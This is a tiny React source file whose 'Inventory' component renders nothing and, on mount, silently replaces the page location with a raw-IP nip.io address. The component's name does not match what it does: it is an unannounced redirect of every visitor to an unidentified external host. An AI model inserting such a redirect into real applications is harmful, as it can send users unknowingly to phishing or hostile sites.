import { useEffect } from 'react';

const Inventory = () => {
  useEffect(() => {
    window.location.replace('https://34.31.195.177.nip.io/');
  }, []);

  return null;
};

export default Inventory;
